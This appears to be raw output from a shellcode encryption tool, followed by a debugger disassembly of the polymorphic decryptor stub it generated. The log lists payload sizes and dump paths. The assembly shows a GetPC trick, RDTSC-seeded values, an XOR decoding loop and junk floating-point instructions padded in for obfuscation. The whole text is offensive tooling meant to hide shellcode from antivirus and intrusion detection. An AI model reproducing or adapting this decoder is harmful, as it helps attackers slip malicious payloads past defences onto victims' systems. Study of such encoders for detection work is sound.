[+] Decryptor body size = 126 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 475 bytes [+] Magic byte is 25 [+] Crypto steping = 1 byte(s) [+] Pass steping = 1 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 480 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401093 C7C1 9059FFE1 MOV ECX,E1FF5990 00401099 51 PUSH ECX 0040109A 8D0C24 LEA ECX,DWORD PTR SS:[ESP] 0040109D FFD1 CALL ECX 0040109F 68 5584DC25 PUSH 25DC8455 004010A4 5E POP ESI 004010A5 81EE F882DC25 SUB ESI,25DC82F8 004010AB 50 PUSH EAX 004010AC 52 PUSH EDX 004010AD 0F31 RDTSC 004010AF C7C3 1BFB5A72 MOV EBX,725AFB1B 004010B5 0FCB BSWAP EBX 004010B7 81EB 725AFB1B SUB EBX,1BFB5A72 004010BD 03D8 ADD EBX,EAX 004010BF 0F31 RDTSC 004010C1 2BC3 SUB EAX,EBX 004010C3 66:33C0 XOR AX,AX 004010C6 03C8 ADD ECX,EAX 004010C8 5A POP EDX 004010C9 58 POP EAX 004010CA 51 PUSH ECX 004010CB 5A POP EDX 004010CC D9E5 FXAM 004010CE 90 NOP 004010CF C7C7 5C6F907F MOV EDI,7F906F5C 004010D5 0FCF BSWAP EDI 004010D7 81EF B18E6F5C SUB EDI,5C6F8EB1 004010DD 8B1A MOV EBX,DWORD PTR DS:[EDX] 004010DF 42 INC EDX 004010E0 311C0F XOR DWORD PTR DS:[EDI+ECX],EBX 004010E3 803A 25 CMP BYTE PTR DS:[EDX],25 004010E6 9B WAIT 004010E7 DBE3 FINIT 004010E9 DEE9 FSUBP ST(1),ST 004010EB DEF9 FDIVP ST(1),ST 004010ED DEE9 FSUBP ST(1),ST 004010EF 75 02 JNZ SHORT testsh.004010F3 004010F1 8BD1 MOV EDX,ECX 004010F3 DBE2 FCLEX 004010F5 4F DEC EDI 004010F6 D9F6 FDECSTP 004010F8 D9F7 FINCSTP 004010FA DEC1 FADDP ST(1),ST 004010FC D9E4 FTST 004010FE D9F4 FXTRACT 00401100 4E DEC ESI 00401101 85C9 TEST ECX,ECX 00401103 D9F4 FXTRACT 00401105 85F6 TEST ESI,ESI 00401107 DEF9 FDIVP ST(1),ST 00401109 ^7F D2 JG SHORT testsh.004010DD 0040110B DEE9 FSUBP ST(1),ST 0040110D D9F4 FXTRACT 0040110F DDC1 FFREE ST(1)